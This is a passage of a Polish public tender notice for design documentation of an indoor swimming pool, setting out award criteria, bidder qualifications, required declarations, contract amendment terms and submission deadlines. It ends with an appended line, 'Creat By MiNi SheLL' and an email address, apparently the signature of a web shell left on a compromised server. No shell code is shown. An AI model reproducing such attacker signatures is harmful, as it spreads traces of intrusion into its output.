za kryterium „Doświadczenie projektanta w specjalności konstrukcyjno budowlanej”<br/>Maksymalna liczba punktów: 100<br/>3. Oferta, która uzyska najwyższą łączną punktację, uważana jest za ofertę najwyżej ocenioną.<br/>4. Maksymalna ilość punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert wynosi 100 pkt. Za najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najwyżej ocenioną ofertę zostanie uznana oferta, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektana w branży konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W celu potwierdzenia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej:<br/>1.1.	Wykonawca wykaże, iż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedno zamówienie (zakończone decyzją pozwolenia na budowę) polegające na wykonaniu dokumentacji projektowej budowy*/przebudowy** minimum jednego budynku przeznaczonego na potrzeby sportu lub rekreacji, pełniącego funkcję pływalni*** o kubaturze co najmniej 8 000 m3.<br/>* należy przez to rozumieć budowę nowego obiektu budowlanego;<br/>** należy przez to rozumieć budowę lub przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2024 r. poz. 725);<br/>*** należy przez to rozumieć kryty obiekt wyposażony w co najmniej jedna nieckę basenową z trwałym brzegiem i dnem, z systemem uzdatniania wody, zapleczem szatniowym, sanitarnym.<br/><br/>1.2. Wykonawca wykaże, że w trakcie realizacji zamówienia dysponować będzie osobą legitymującą się kwalifikacjami zawodowymi i doświadczeniem: projektant posiadający uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, który opracował co najmniej jedną dokumentację projektową budowy*/przebudowy**minimum jednego budynku przeznaczonego na potrzeby sportu lub rekreacji, pełniącego funkcję pływalni*** o kubaturze co najmniej 8 000 m3.<br/>* należy przez to rozumieć budowę nowego obiektu budowlanego;<br/>** należy przez to rozumieć budowę lub przebudowę w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2024 r. poz. 725);<br/>*** należy przez to rozumieć kryty obiekt wyposażony w co najmniej jedna nieckę basenową z trwałym brzegiem i dnem, z systemem uzdatniania wody, zapleczem szatniowym, sanitarnym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawcy dotyczące przynależności do grupy kapitałowej – zgodnie z Załącznikiem nr 4 do SWZ.<br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w oświadczenie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących:<br/>1.1. zdolności technicznej lub zawodowej Zamawiający żąda złożenia:<br/>1.1.1. wykazu usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz usług zgodnie z Załącznikiem nr 3a do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>1.1.2. wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z Załącznikiem nr 3b do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia)/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według Załącznika nr 2 do SWZ .<br/>2. Oświadczenie Wykonawcy/ Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia /Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5 do SWZ.<br/>3. Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy. Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>4. Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) – zgodnie z Załącznikiem nr 7 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasadami tych podmiotów.<br/>5. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania zamawiający może zażądać od wykonawcy odpisu lub informacji z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wyżej, jeśli zamawiający może je uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w dokument.<br/>6. Oświadczenie Wykonawcy / Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia / Podwykonawcy /Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 UOBN –Załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku:<br/>1.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać złożone w formie opisanej w SWZ, Dział VII, pkt. 2.4.<br/>1.2. W celu potwierdzenia braku podstaw wykluczenia z postępowania każdy z Wykonawców złoży osobno oświadczenie wymienione w SWZ, Dział VII, pkt. 2.3, 2.7. i 3.3.<br/>1.3. W celu potwierdzenia spełniania warunków udziału w postępowaniu każdy z Wykonawców złoży osobno dokumenty i oświadczenia wymienione w SWZ, Dział VII, pkt. 2.2., 3.1. i 3.2. w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>1.4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w SWZ,<br/>Dział VII, pkt. 2.6.<br/>1.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.<br/>1.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>1.7. Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia kluczowych etapów realizacji zadania.<br/>1.8. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oświadczenie dotyczące<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewiduje się możliwość dokonania zmiany istotnych postanowień umowy w stosunku do treści złożonej oferty, na<br/>podstawie której dokonano wyboru wykonawcy w następujących okolicznościach:<br/>1.1. zmiana terminów wykonania umowy:<br/>1.1.1. z przyczyn od Wykonawcy niezależnych,których nie można było przewidzieć w chwili zawarcia umowy, nie jest<br/>możliwe dotrzymanie terminu wykonania przedmiotu umowy;<br/>1.1.2. ze względu na konieczność wykonania prac dodatkowych lub zamiennych niezbędnych dla prawidłowego wykonania<br/>przedmiotu umowy;<br/>1.1.3.w przypadku gdy zajdzie konieczność rozszerzenia zakresu prac projektowych o zakres prac remontowych, których<br/>ujęcie w dokumentacji projektowej okaże się uzasadnione dla Zamawiającego;<br/>1.1.4. wynikająca z okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i niemożliwe do<br/>uniknięcia przez Wykonawcę opóźnienie;<br/>1.1.5. wynikająca z okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione przez Wykonawcę<br/>opóźnienie, w szczególności niedochowanie przez Zamawiającego terminu na podjęcie decyzji o wyborze wariantu<br/>wielobranżowej koncepcji;<br/>1.1.6. wynikająca z działania lub braku działania organów administracji i innych podmiotów o kompetencjach zbliżonych do<br/>organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, które<br/>spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br/>a) w wyniku przekroczenia zakreślonych przez prawo lub regulaminy,<br/>b) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn<br/>niezawinionych przez Wykonawcę;<br/>c) wynikająca z konieczności koordynacji prac projektowych wykonywanych w ramach niniejszej umowy z pracami lub<br/>innymi czynnościami prowadzonymi przez inne podmioty lub skutkującymi koniecznością wprowadzenia zmian do<br/>przyjętych przez Wykonawcę rozwiązań projektowych;<br/>d) wynikająca z konieczności zastosowania odmiennych rozwiązań projektowych z uwagi na uzgodnienia z podmiotami, o<br/>których mowa w lit. c) – o czas niezbędny dla wprowadzenia odmiennych rozwiązań projektowych lub o czas przekroczenia<br/>typowych w danych okolicznościach terminów dokonania uzgodnień;<br/>niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej<br/>staranności;<br/>1.1.8. wynikająca ze szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do projektowania;<br/>1.1.9. wynikająca z innych przyczyn zewnętrznych niezależnych od wykonawcy skutkujących brakiem możliwości<br/>prowadzenia prac lub wykonywania innych czynności przewidzianych umową, które spowodowały niezawinione i<br/>niemożliwe do uniknięcia przez Wykonawcę opóźnienie;<br/>1.1.10. w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na wykonanie<br/>przedmiotu umowy;<br/>1.1.11. w przypadku kolizji z planowanymi lub równolegle realizowanymi pracami projektowymi lub planistycznymi;<br/>1.1.12. w przypadku, gdy okoliczności związane z ogłoszeniem lub trwaniem stanu epidemii, stanu zagrożenia<br/>epidemicznego lub związane z konfliktem zbrojnym na pomiędzy Rosją a Ukraina spowodowały niezawinione przez<br/>Wykonawcę opóźnienie.<br/>1.1.13. W przypadku wniesienia odwołania przez Wykonawcę zgodnie z art. 513 pkt 1) i 2) ustawy Pzp.<br/>1.2. zmiana wysokości wynagrodzenia w przypadkach określonych w SWZ<br/>1.3. Zmiana wysokości wynagrodzenia w zakresie o którym mowa w art. 439 Pzp, w n/w przypadkach i zasadach<br/>określonych w SWZ.<br/>1.4. Zmiana wysokości wynagrodzenia w przypadku zaistnienia okoliczności o których mowa w pkt. 1.1.3. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umlebork.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-01 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com